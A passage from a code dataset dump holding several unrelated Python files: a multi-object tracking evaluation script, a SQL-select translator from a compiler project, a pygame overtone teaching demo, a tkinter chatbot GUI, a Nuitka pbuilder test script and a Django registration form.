OrderedDict()\r\n\r\n def update(self, rects, cnum = 3):\r\n dets = np.array(rects)\r\n \"\"\"\r\n Params:\r\n dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]\r\n cnum - number of center positions to average\r\n Requires: this method must be called once for each frame even with empty detections.\r\n Returns the a similar array, where the last column is the object ID.\r\n NOTE: The number of objects returned may differ from the number of detections provided.\r\n \"\"\"\r\n 
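# [editor's note] update() pipeline: predict every Kalman track, match detections to the\r\n # predictions with IoU + Hungarian assignment (linear_sum_assignment), re-match leftovers\r\n # by trajectory colinearity, then create/retire tracks via min_hits and max_age.\r\n 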
self.frame_count += 1\r\n #get predicted locations from existing trackers.\r\n trks = np.zeros((len(self.trackers),5))\r\n ctmean = []\r\n to_del = []\r\n ret = []\r\n \r\n for t,trk in enumerate(trks):\r\n pos = self.trackers[t].predict()[0]\r\n trk[:] = [pos[0], pos[1], pos[2], pos[3], 0]\r\n if(np.any(np.isnan(pos))):\r\n to_del.append(t)\r\n trks = np.ma.compress_rows(np.ma.masked_invalid(trks))\r\n #for t in reversed(to_del):\r\n for t in iter(to_del):\r\n self.trackers.pop(t)\r\n matched, unmatched_dets, unmatched_trks = associate_detections_to_trackers(dets,trks)\r\n\r\n for t in unmatched_trks:\r\n cnt = np.array(self.trackers[t].cthist)\r\n cnt = np.array([np.convolve(cnt[:,i], np.ones((cnum,))/cnum, mode='valid') for i in (0,1)]).T\r\n if cnt.shape[0] == 1: # fix same len\r\n cnt = np.concatenate((cnt,cnt),axis=0)\r\n ctmean.append(cnt)\r\n\r\n rematch, new_dets, lost_trks = associate_detections_to_trackers(dets[unmatched_dets],ctmean,colinearity,0.6)\r\n rematch = np.array([unmatched_dets[rematch[:,0]], unmatched_trks[rematch[:,1]]]).T\r\n matched = np.concatenate((matched, rematch.reshape(-1,2)))\r\n unmatched_dets = unmatched_dets[new_dets]\r\n unmatched_trks = unmatched_trks[lost_trks]\r\n\r\n #update matched trackers with assigned detections\r\n for t,trk in enumerate(self.trackers):\r\n if(t not in unmatched_trks):\r\n d = matched[np.where(matched[:,1]==t)[0],0]\r\n trk.update(dets[d,:][0], cnum+1)\r\n\r\n #create and initialise new trackers for unmatched detections\r\n for i in unmatched_dets:\r\n trk = KalmanBoxTracker(dets[i,:]) \r\n self.trackers.append(trk)\r\n i = len(self.trackers)\r\n for trk in reversed(self.trackers):\r\n #for trk in iter(self.trackers): #don't work\r\n d = trk.get_state()[0]\r\n if((trk.time_since_update < self.max_age) and (trk.hit_streak >= self.min_hits or self.frame_count <= self.min_hits)):\r\n ret.append(np.concatenate((d,[trk.id+1],[trk.time_since_update])).reshape(1,-1)) # +1 as MOT benchmark requires positive\r\n i -= 1\r\n #remove dead tracklet\r\n if(trk.time_since_update > self.max_age):\r\n self.trackers.pop(i)\r\n \r\n \r\n return_trackers = np.concatenate(ret)\r\n current_objects = OrderedDict()\r\n current_trajectory = OrderedDict()\r\n current_boundingBoxes = OrderedDict()\r\n \r\n for d in return_trackers:\r\n d = d.astype(np.int32)\r\n centroid = [int((d[0] + d[2]) / 2), int((d[1] + d[3]) / 2)]\r\n ID = d[4]\r\n current_objects[ID] = centroid\r\n current_boundingBoxes[ID] = d[0:4]\r\n \r\n try:\r\n self.trajectory[ID].append(centroid)\r\n except:\r\n self.trajectory[ID] = list([centroid])\r\n current_trajectory[ID] = self.trajectory[ID]\r\n \r\n return current_objects, current_trajectory, current_boundingBoxes \r\n\r\n\r\n# Get the bounding boxes for an image file\r\ndef get_bb(image_labels, image_file):\r\n label = pd.read_table(image_labels[image_file], delim_whitespace=True,\r\n names=('~', 'x', 'y', 'w', 'h'),\r\n dtype={'~': np.uint8, 'x': np.float32, 'y': np.float32, 'w': np.float32,\r\n 'h': np.float32})\r\n label = label.drop('~', axis=1)\r\n return label\r\n\r\n# Convert centroid and height-width bb format to initial and endpoint format\r\ndef cvt_bb(label):\r\n rect = []\r\n for car_no in range(len(label)):\r\n startX = label['x'][car_no] - label['w'][car_no]/2\r\n startY = label['y'][car_no] - label['h'][car_no]/2\r\n endX = label['x'][car_no] + label['w'][car_no]/2\r\n endY = label['y'][car_no] + label['h'][car_no]/2\r\n \r\n rect.append((startX, startY, endX, endY))\r\n return rect\r\n\r\n# Draw all the 
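ground-truth boxes on an image for visual inspection.\r\n# [editor's note] cvt_bb() returns corner coordinates still normalised to [0, 1]; callers scale\r\n# them by np.array([W, H, W, H]) before handing rects to the trackers.\r\n# Draw all the 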
boundingboxes on Image\r\ndef draw_bb(img, label):\r\n height, width = img.shape[0], img.shape[1]\r\n\r\n for car_no in range(len(label)):\r\n x = int(label['x'][car_no] * width)\r\n y = int(label['y'][car_no] * height)\r\n w = int(label['w'][car_no] * width / 2)\r\n h = int(label['h'][car_no] * height / 2)\r\n\r\n cv2.rectangle(img, (x - w, y - h), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n return img\r\n\r\n\r\n\r\n\r\n#dataset_dir = \"input\"\r\n\r\n#images_dir = dataset_dir + \"/images1\"\r\n#labels_dir = dataset_dir + \"/labels1\"\r\n\r\nimages_dir = args[\"inp\"]\r\nlabels_dir = args[\"lab\"]\r\n\r\nimage_labels = {}\r\n\r\n\r\nfor img in glob.glob(images_dir + \"/*.jpg\", recursive=True):\r\n label = img.replace(images_dir, labels_dir)\r\n label = label.replace(\".jpg\", \".txt\")\r\n image_labels[img] = label\r\n\r\nimages = list(image_labels.keys())\r\nlist.sort(images)\r\n\r\nprint(\"Total images: \" + str(len(image_labels)))\r\n\r\n\r\n\r\n\r\n\r\n'''\r\n# dataset_dir = \"../../Dataset/fisheye-day-30072020\"\r\n\r\n# images_dir = dataset_dir + \"/images\"\r\n# labels_dir = dataset_dir + \"/labels\"\r\n\r\n# sequence = \"01_fisheye_day\"\r\n\r\n# image_labels = {}\r\n\r\n\r\n# for img in glob.glob(images_dir + \"/*.jpg\", recursive=True):\r\n# label = img.replace(images_dir, labels_dir)\r\n# label = label.replace(\".jpg\", \".txt\")\r\n# if sequence in img:\r\n# image_labels[img] = label\r\n\r\n# images = list(image_labels.keys())\r\n# list.sort(images)\r\n\r\n# print(\"Total images: \" + str(len(image_labels)))\r\n'''\r\n\r\ndef gt_generator(tracker, tracking_GT_dir):\r\n if tracker == \"euclidean\":\r\n mot_tracker = EuclideanTracker()\r\n elif tracker == \"sort\":\r\n mot_tracker = SortTracker(max_age = 10, min_hits=6) #create instance of the SORT tracker\r\n \r\n ###Getting GT\r\n #tracking_GT_dir = \"input/fisheye_day_tracking\"\r\n \r\n if not os.path.exists(tracking_GT_dir):\r\n os.mkdir(tracking_GT_dir)\r\n \r\n \r\n frame = cv2.imread(images[0])\r\n (H, W) = frame.shape[:2]\r\n \r\n # loop over the frames from the video stream\r\n for i in tqdm(range(len(image_labels))):\r\n # read the next frame from the video stream and resize it\r\n image_file = images[i]\r\n label = get_bb(image_labels, image_file)\r\n rects = cvt_bb(label) * np.array([W, H, W, H])\r\n \r\n objects, _ , boundingBoxes = mot_tracker.update(rects)\r\n \r\n output_table = np.zeros((len(objects), 5), dtype=int)\r\n idx = 0\r\n \r\n for (objectID, centroid) in objects.items():\r\n output_table[idx, 0] = objectID\r\n output_table[idx, 1:5] = boundingBoxes[objectID].astype(int)\r\n idx += 1\r\n \r\n filename = image_labels[image_file].replace(labels_dir, tracking_GT_dir)\r\n np.savetxt(filename, output_table, fmt='%d')\r\n \r\n del mot_tracker\r\n print(\"Done with GT\")\r\n\r\n\r\ndef det_generator(tracker, tracking_detection_dir):\r\n if tracker == \"euclidean\":\r\n mot_tracker1 = EuclideanTracker()\r\n elif tracker == \"sort\":\r\n mot_tracker1 = SortTracker(max_age = 10, min_hits=6) #create instance of the SORT tracker\r\n \r\n ####detection\r\n \r\n #tracking_detection_dir = \"input/fisheye_day_detection\"\r\n \r\n if not os.path.exists(tracking_detection_dir):\r\n os.mkdir(tracking_detection_dir)\r\n \r\n #mot_tracker1 = SortTracker() #create instance of the tracker\r\n \r\n \r\n frame = cv2.imread(images[0])\r\n (H, W) = frame.shape[:2]\r\n \r\n \r\n weights = args[\"weights\"]\r\n device = select_device('')\r\n half = device.type != 'cpu' # half precision only supported on CUDA\r\n model = 
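None  # placeholder; the real network is loaded on the next line\r\n # [editor's note, hedged] attempt_load() from yolov5 accepts a single weights path or a list\r\n # and may return an Ensemble of models; device/half were prepared just above.\r\n model = 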
attempt_load(weights, map_location=device) # load FP32 model ##here model checks whether one model or ensemble of models will be loaded\r\n \r\n yolo = yolo_detector(model, device, half)\r\n \r\n \r\n # loop over the frames from the video stream\r\n for i in tqdm(range(len(image_labels))):\r\n \r\n image_file = images[i]\r\n #label = get_bb(image_labels, image_file)\r\n #rects = cvt_bb(label) * np.array([W, H, W, H])\r\n \r\n image_size = args[\"img\"]\r\n rects , frame = yolo.infer_on_single_img(image_file, image_size)\r\n if tracker == \"sort\":\r\n rects = np.array(rects)\r\n \r\n objects, _ , boundingBoxes = mot_tracker1.update(rects)\r\n \r\n output_table = np.zeros((len(objects), 5), dtype=int)\r\n idx = 0\r\n \r\n for (objectID, centroid) in objects.items():\r\n output_table[idx, 0] = objectID\r\n output_table[idx, 1:5] = boundingBoxes[objectID].astype(int)\r\n idx += 1\r\n \r\n filename = image_labels[image_file].replace(labels_dir, tracking_detection_dir)\r\n np.savetxt(filename, output_table, fmt='%d')\r\n \r\n del mot_tracker1\r\n print(\"Done Detection\")\r\n\r\n\r\ntracking_detection_dir = \"input/fisheye_day_detection\"\r\ntracking_GT_dir = \"input/fisheye_day_tracking\"\r\n\r\ngt_generator(tracker, tracking_GT_dir)\r\ndet_generator(tracker, tracking_detection_dir)\r\n\r\n\r\nimport motmetrics as mm\r\n\r\ndef get_bb_with_ID(filename):\r\n lb = pd.read_table(filename, delim_whitespace=True,\r\n names=('ID', 'x1', 'y1', 'x2', 'y2'),\r\n dtype={'ID': np.uint16, 'x1': np.uint16, 'y1': np.uint16,\r\n 'x2': np.uint16, 'y2': np.uint16})\r\n \r\n BBs = np.zeros((len(lb), 4), dtype=int)\r\n \r\n\r\n IDs = np.array(lb['ID'][:])\r\n BBs[:, 0] = lb['x1'][:]\r\n BBs[:, 1] = lb['y1'][:]\r\n BBs[:, 2] = lb['x2'][:]\r\n BBs[:, 3] = lb['y2'][:]\r\n \r\n return IDs, BBs\r\n\r\n\r\ndef evaluate_tracking(tracking_GT_dir, tracking_detection_dir):\r\n detection_files = glob.glob(tracking_detection_dir + \"/*.txt\", recursive=True)\r\n list.sort(detection_files)\r\n \r\n # Create an accumulator that will be updated during each frame\r\n acc = mm.MOTAccumulator(auto_id=True)\r\n \r\n for i in tqdm(range(len(detection_files))):\r\n det_file = detection_files[i]\r\n gt_file = det_file.replace(tracking_detection_dir, tracking_GT_dir)\r\n \r\n detector_hypotheses, detector_bbs = get_bb_with_ID(det_file)\r\n gt_objects, gt_bbs = get_bb_with_ID(gt_file)\r\n \r\n distances = mm.distances.iou_matrix(gt_bbs, detector_bbs, max_iou=0.5)\r\n \r\n # Call update once for per frame. 
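(auto_id=True assigns the frame ids.)\r\n # [editor's note, hedged] motmetrics documents rectangles as (x, y, width, height); the corner\r\n # format (x1, y1, x2, y2) built above is worth double-checking against mm.distances.iou_matrix.\r\n # 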
For now, assume distances between\r\n # frame objects / hypotheses are given.\r\n acc.update(\r\n gt_objects, # Ground truth objects in this frame\r\n detector_hypotheses, # Detector hypotheses in this frame\r\n distances # Distances from GT to hypotheses\r\n )\r\n\r\n \r\n mh = mm.metrics.create()\r\n summary = mh.compute(\r\n acc,\r\n metrics=mm.metrics.motchallenge_metrics, #metrics=['num_frames', 'mota', 'motp']\r\n name='overall'\r\n )\r\n\r\n strsummary = mm.io.render_summary(\r\n summary,\r\n formatters=mh.formatters,\r\n namemap=mm.io.motchallenge_metric_names\r\n )\r\n print(strsummary)\r\n \r\n return strsummary\r\n\r\n#tracking_detection_dir = \"input/fisheye_day_detection\"\r\n#tracking_GT_dir = \"input/fisheye_day_tracking\"\r\nsummary = evaluate_tracking(tracking_GT_dir, tracking_detection_dir)\r\n\r\n##saving result into a txt file\r\ntext_file = open(\"mot_result.txt\", \"w\")\r\nn = text_file.write(summary)\r\ntext_file.close()","sub_path":"mot_eval.py","file_name":"mot_eval.py","file_ext":"py","file_size_in_byte":26563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272119069","text":"from Instrucciones.TablaSimbolos.Instruccion import Instruccion\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo_Dato, Tipo\nfrom Instrucciones.Excepcion import Excepcion\nfrom Instrucciones.Sql_select.Select import Select\nfrom Instrucciones.Tablas.Tablas import Tablas\nfrom Instrucciones.Identificador import Identificador\nimport pandas as pd\n\n\nclass SelectLista(Instruccion):\n def __init__(self, lista, strGram, linea, columna):\n Instruccion.__init__(self,Tipo(Tipo_Dato.QUERY),linea,columna,strGram)\n self.lista = lista\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n columnas = []\n valores = []\n selectEncontrado = 0\n for ins in self.lista:\n if isinstance(ins, Alias):\n resultado = ins.expresion.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores.append(str(resultado))\n columnas.append(ins.id)\n elif isinstance(ins, Select):\n resultado = ins.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores = resultado\n columnas = ins.devolverColumnas(tabla,arbol)\n if isinstance(columnas, Excepcion):\n return columnas\n selectEncontrado = 1\n else:\n resultado = ins.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores.append(str(resultado))\n columnas.append('col')\n #print(\"COLUMNAS-------------------------->\",columnas)\n #print(\"VALORES-------------------------->\",valores)\n if(selectEncontrado == 0):\n valores = [valores]\n \n if(arbol.getRelaciones() == False):\n arbol.getMensajeTabla(columnas,valores)\n else:\n n = Tablas(\"tabla\",None)\n n.data = valores\n n.lista_de_campos = columnas\n return n\n else:\n if(arbol.getRelaciones() == False):\n arbol.getMensajeTabla(columnas,valores)\n else:\n n = Tablas(\"tabla\",None)\n n.lista_de_campos = columnas\n n.data = valores\n return n\n\n def analizar(self, tabla, arbol):\n pass\n def get_methods(object6, spacing=20):\n methodList = []\n for method_name in dir(object6):\n try:\n if callable(getattr(object6, method_name)):\n methodList.append(str(method_name))\n except:\n methodList.append(str(method_name))\n processFunc = (lambda s: ' '.join(s.split())) or (lambda s: s)\n for method in methodList:\n try:\n print(str(method.ljust(spacing)) + ' ' +\n processFunc(str(getattr(object6, method).__doc__)[0:90]))\n except:\n print(method.ljust(spacing) 
+ ' ' + ' getattr() failed')\n\n def extraer(self,tabla,arbol):\n \n cadena = \" \"\n print(\"select99999\") \n mitabla =\" \"\n\n try: \n cadena = \"\\\"select \"\n wherecond = \" \"\n for x in self.lista:\n print(\"entro\") \n print(x)\n print(\"ttttt\") \n\n print(x.lcol2)\n print(\"entrrrrrrrro\") \n if isinstance(x, Select):\n print(\"isinstance Select\") \n lcol2=x.getparam2(tabla,arbol)\n\n for xu in lcol2:\n print(\"xu lcol2 es \",xu) \n if isinstance(xu, Identificador):\n print(\"isinstance Identificador\") \n mitabla = xu.devolverId(tabla,arbol)\n print(\"mitabla es\",mitabla) \n\n\n lcol20=x.getparam1(tabla,arbol)\n\n for xu in lcol20:\n print(\"xu lcoli20 es \",xu) \n print(xu) \n\n try:\n if isinstance(xu, Identificador):\n print(\"isinstance Identificador\") \n cadena += xu.devolverId(tabla,arbol)\n print(\"cadena es\") \n print(xu.devolverId(tabla,arbol))\n else :\n print(\"no es\") \n\n cadena += xu\n print(\"no es\",cadena) \n\n except Exception as e:\n print(e)\n print(\"cadu.deena es\",cadena) \n\n\n \n\n cadena += \" from \"+mitabla \n\n if x.where !=None:\n wherecond=x.where.extraer(tabla,arbol)\n cadena += wherecond\n\n cadena += \";\\\"\"\n print(\"cadenao es\",cadena) \n\n except Exception as e:\n print(e)\n \n return cadena \n def traducir(self, tabla, arbol):\n\n cadena = \" \"\n\n print(\"seguira \") \n try: \n cadena = self. extraer(tabla,arbol)\n\n except Exception as e:\n print(e)\n print(\"cadenaiuo es\",cadena) \n\n arbol.addComen(\"Asignar cadena\")\n temporal1 = tabla.getTemporal()\n arbol.addc3d(f\"{temporal1} = { cadena }\")\n\n arbol.addComen(\"Entrar al ambito\")\n temporal2 = tabla.getTemporal()\n arbol.addc3d(f\"{temporal2} = P+2\")\n temporal3 = tabla.getTemporal()\n arbol.addComen(\"parametro 1\")\n arbol.addc3d(f\"{temporal3} = { temporal2}+1\")\n arbol.addComen(\"Asignacion de parametros\")\n arbol.addc3d(f\"Pila[{temporal3}] = {temporal1}\")\n\n arbol.addComen(\"Llamada de funcion\")\n arbol.addc3d(f\"P = P+2\")\n arbol.addc3d(f\"funcionintermedia()\")\n \n arbol.addComen(\"obtener resultado\")\n temporalX = tabla.getTemporal()\n arbol.addc3d(f\"{temporalX} = P+2\")\n temporalR = tabla.getTemporal()\n arbol.addc3d(f\"{temporalR} = Pila[{ temporalX }]\")\n\n arbol.addComen(\"Salida de funcion\")\n arbol.addc3d(f\"P = P-2\")\n\n print(\"hello\")\n\n print(arbol.get3d())\n print(\"dsliio hello\")\n\n\nclass Alias():\n def __init__(self, id, expresion):\n self.id = id\n self.expresion = expresion\n self.tipo = None","sub_path":"parser/fase2/team02/Fase2_G2/Instrucciones/Sql_select/SelectLista.py","file_name":"SelectLista.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414451572","text":"# M2Sa2-hear-fund-saw-square-triangle.py\r\n# -----------------------------------------\r\n# Using M2Salib.py to make series with overtones and play them back to hear how they sound.\r\n#\r\n# Revision 0.4 - 03 Apr 2020 - Knud Funch, Soundhub danmark - LYDKit til undervisningbrug - Region MidtJylland\r\n# To be used as material in module 2 test in Physics/Math class\r\n#\r\n# To be run from within Thonny IDE on either PC, MAC (or Raspberry PI).\r\n#\r\nfrom M2Sa0lib import *\r\n# ------------------------------------------------------------------------------------------------------------------------------\r\n#\r\n# Below - Example 1 - play:\r\n# - Fundamantal frequency \r\n# - Fundamantal frequency plus odd overtones (giving a square like signal - see 
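M2Sb-e1-plot-fund-saw-square-triangle)\r\n#   [editor's note, hedged] a textbook triangle wave has odd harmonics at 1/n**2 amplitude;\r\n#   the alternating-sign 1/n series used below is why 'triangle' and 'square' sound so alike.\r\n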
# - Fundamental frequency plus odd overtones with shifting sign (giving a triangle like signal)\r\n# (phase shifted by pi)\r\n#\r\n# Note - Triangle and square sound almost the same - Can you make them more differentiated?\r\n# Hint: Add more overtones to square.\r\n#\r\n# Q - How do the saw and the square relate to standing waves in tubes? Can you explain?\r\n# \r\n\r\nbf = 440 # Keep bf*13 < 1/2 of sf !!\r\nba = 8000\r\n\r\nf1 = generate_pure_tone(bf,ba) # fundamental\r\n\r\no2 = generate_pure_tone(2*bf,1/2*ba) # n'th overtone with n*fundamental freq \r\no3 = generate_pure_tone(3*bf,1/3*ba) # and 1/n times fundamental amplitude \r\no4 = generate_pure_tone(4*bf,1/4*ba)\r\no5 = generate_pure_tone(5*bf,1/5*ba)\r\no6 = generate_pure_tone(6*bf,1/6*ba)\r\no7 = generate_pure_tone(7*bf,1/7*ba)\r\no8 = generate_pure_tone(8*bf,1/8*ba)\r\no9 = generate_pure_tone(9*bf,1/9*ba)\r\no10 = generate_pure_tone(10*bf,1/10*ba)\r\no11 = generate_pure_tone(11*bf,1/11*ba)\r\no12 = generate_pure_tone(12*bf,1/12*ba)\r\no13 = generate_pure_tone(13*bf,1/13*ba)\r\n\r\naddall = f1+o2+o3+o4+o5+o6+o7+o8+o9+o10+o11+o12+o13 # saw\r\naddodd = f1+o3+o5+o7+o9+o11+o13 # square\r\na_sodd = f1-o3+o5-o7+o9-o11+o13 # triangle\r\n\r\nprint(\"pure sine\")\r\npygame.sndarray.make_sound(f1).play()\r\ntime.sleep(d+0.1)\r\nprint(\"saw\")\r\npygame.sndarray.make_sound(addall).play()\r\nwhile True:\r\n time.sleep(d+0.1)\r\n print(\"square\")\r\n pygame.sndarray.make_sound(addodd).play()\r\n time.sleep(d+0.1)\r\n print(\"triangle\")\r\n pygame.sndarray.make_sound(a_sodd).play()\r\n \r\n ","sub_path":"M2Sa2-hear-fund-saw-square-triangle.py","file_name":"M2Sa2-hear-fund-saw-square-triangle.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244183662","text":"from chatterbot import ChatBot\r\nimport tkinter as tk\r\ntry:\r\n import ttk as ttk\r\n import ScrolledText\r\nexcept ImportError:\r\n import tkinter.ttk as ttk\r\n import tkinter.scrolledtext as ScrolledText\r\nimport time\r\nimport pyttsx3\r\n\r\nfrom appGenerator import startGenerator\r\n\r\n\r\nclass TkinterGUIExample(tk.Tk):\r\n\r\n def __init__(self, *args, **kwargs):\r\n \r\n self.getVoiceAssistance = False\r\n self.getSpeachRecognizer = False\r\n\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.bot= ChatBot('Bot')\r\n\r\n self.title(\"App Generator\")\r\n\r\n self.engine = pyttsx3.init()\r\n self.engine.setProperty('rate', 115)\r\n self.engine.setProperty('volume', 0.9)\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n \r\n self.grid()\r\n\r\n self.conversation_lbl = ttk.Label(self, anchor=tk.E, text='Bot-Integrated App Generator')\r\n self.conversation_lbl.grid(column=0, row=0, sticky='w', padx=3, pady=3)\r\n\r\n self.conversation = ScrolledText.ScrolledText(self, state='disabled')\r\n self.conversation.grid(column=0, row=1, columnspan=3, sticky='nesw', padx=3, pady=3)\r\n\r\n self.usr_input = ttk.Entry(self, state='normal')\r\n self.usr_input.grid(column=0, row=2, rowspan = 2, sticky='news', padx=3, pady=3)\r\n\r\n self.respond = tk.Button(self, text='Get Response', command=self.get_response)\r\n self.respond.grid(column=1, row=2, columnspan=2, sticky='news', padx=3, pady=3)\r\n\r\n self.voiceAssistance = tk.Button(self, text='Voice Assistance', command=self.get_voiceAssistance)\r\n self.voiceAssistance.grid(column=1, row=3, sticky='news', padx=3, pady=3)\r\n\r\n self.speachRecognizer = tk.Button(self, text='Speech 
Recognizer', command=self.get_speachRecognizer)\r\n self.speachRecognizer.grid(column=2, row=3, sticky='news', padx=3, pady=3)\r\n\r\n def get_voiceAssistance(self):\r\n self.getVoiceAssistance = not self.getVoiceAssistance\r\n if self.getVoiceAssistance:\r\n self.voiceAssistance[\"bg\"] = '#2A95BE'\r\n self.voiceAssistance[\"fg\"] = 'white'\r\n else:\r\n self.voiceAssistance[\"bg\"] = '#F0F0F0'\r\n self.voiceAssistance[\"fg\"] = 'black'\r\n \r\n def get_speachRecognizer(self):\r\n self.getSpeachRecognizer = not self.getSpeachRecognizer\r\n if self.getSpeachRecognizer:\r\n self.speachRecognizer[\"bg\"] = '#2A95BE'\r\n self.speachRecognizer[\"fg\"] = 'white'\r\n else:\r\n self.speachRecognizer[\"bg\"] = '#F0F0F0'\r\n self.speachRecognizer[\"fg\"] = 'black'\r\n\r\n def get_response(self):\r\n\r\n user_input = self.usr_input.get()\r\n self.usr_input.delete(0, tk.END)\r\n\r\n response = self.bot.get_response(user_input)\r\n\r\n self.conversation['state'] = 'normal'\r\n\r\n if user_input.startswith( 'create' ):\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" \r\n )\r\n startGenerator(user_input, self)\r\n elif user_input == 'bye':\r\n if self.getVoiceAssistance:\r\n self.engine.say(\"bye\")\r\n self.engine.runAndWait()\r\n bot_root.quit()\r\n elif user_input == 'help':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"ChatBot: use 'create' keyword to start creating app and also specify the language in which app should be developed.\"\r\n example: 'create addition of 2 numbers in vuejs'\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"ChatBot: use 'create' keyword to start creating app and also specify the language in which app should be developed.\r\n example: 'create addition of 2 numbers in vuejs'\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"use params to list:\r\n '-O' for listing operations \r\n '-L' for listing the languages in which bot can build app\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"use params to list:\r\n '-O' for listing operations \r\n '-L' for listing the languages in which bot can build app\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list -O':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"List of operations:\r\n 'add / addition / sum'\r\n 'difference / subtract / subtraction'\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"List of operations:\r\n 'add / addition / sum'\r\n 'difference / subtract / subtraction'\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list -L':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"ChatBot: List of languages in which bot can build apps:\r\n 'javascript'\r\n 'vuejs'\r\n 'angular' \\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"List of languages in which bot can build apps:\r\n 'javascript'\r\n 'vuejs'\r\n 'angular'\"\"\")\r\n self.engine.runAndWait()\r\n else:\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"ChatBot: \" + str(response.text) + \"\\n\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(str(response.text))\r\n self.engine.runAndWait()\r\n\r\n self.conversation['state'] = 'disabled'\r\n time.sleep(0.5)\r\n\r\n\r\nbot_root = 
TkinterGUIExample()\r\nbot_root.mainloop()","sub_path":"botGui.py","file_name":"botGui.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164635647","text":"#!/usr/bin/env python\n# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com\n#\n# Python test originally created or extracted from other peoples work. The\n# parts from me are licensed as below. It is at least Free Software where\n# it's copied from other people. In these cases, that will normally be\n# indicated.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport getpass\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nnuitka_dir = os.path.normcase(\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"..\")\n)\n\ncode_name = sys.argv[1]\nverbose = int(sys.argv[2])\n\nif not verbose:\n sys.stdout = open(\"/dev/null\")\n sys.stderr = open(\"/dev/null\")\n\nshutil.rmtree(\"Asserts-%s.build\" % code_name, ignore_errors=True)\nshutil.rmtree(\"Asserts-%s.dist\" % code_name, ignore_errors=True)\n\nwith tempfile.NamedTemporaryFile(\"w\", delete=False) as script_file:\n script_file.write(\"apt-get install -y lsb-release python python-dev\\n\")\n script_file.write(\"CODE_NAME=`lsb_release -c -s`\\n\")\n script_file.write('echo Hello pbuilder for \"$CODE_NAME\".\\n')\n script_file.write(\"cd %s\\n\" % nuitka_dir)\n script_file.write(\n \"python bin/nuitka --python-flag=-S --standalone tests/basics/Asserts.py\\n\"\n )\n\n # script_file.write(\"python3 bin/nuitka --standalone tests/basics/Asserts.py\\n\")\n\n tmp_script = script_file.name\n\ntry:\n subprocess.check_call(\n [\n \"sudo\",\n \"pbuilder\",\n \"--execute\",\n \"--basetgz\",\n \"/var/cache/pbuilder/\" + code_name + \".tgz\",\n \"--bindmounts\",\n nuitka_dir,\n tmp_script,\n ]\n )\n\n shutil.move(\"Asserts.build\", \"Asserts-%s.build\" % code_name)\n shutil.move(\"Asserts.dist\", \"Asserts-%s.dist\" % code_name)\n\n subprocess.check_call(\n [\n \"sudo\",\n \"chown\",\n \"-R\",\n getpass.getuser() + \":\",\n \"Asserts-%s.build\" % code_name,\n \"Asserts-%s.dist\" % code_name,\n ]\n )\n\nfinally:\n os.unlink(tmp_script)\n","sub_path":"tests/standalone/run_pbuilder.py","file_name":"run_pbuilder.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522923465","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.validators import validate_slug\n\nfrom api.users import validators\nfrom libs.blacklist import validate_blacklist_name\n\n\nclass RegistrationForm(UserCreationForm):\n username = forms.CharField(\n max_length=150,\n validators=[validate_slug, validate_blacklist_name])\n email = forms.EmailField(\n help_text='email address',\n required=True,\n validators=[\n validators.validate_new_email,\n ]\n )\n tos = forms.BooleanField(\n widget=forms.CheckboxInput,\n label=\"I have read and agree 
to the Terms of Service\",\n error_messages={\n 'required': \"You must agree to the terms to register\",\n }\n )\n\n class Meta(UserCreationForm.Meta):\n fields = (\"username\", \"email\")\n","sub_path":"polyaxon/api/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
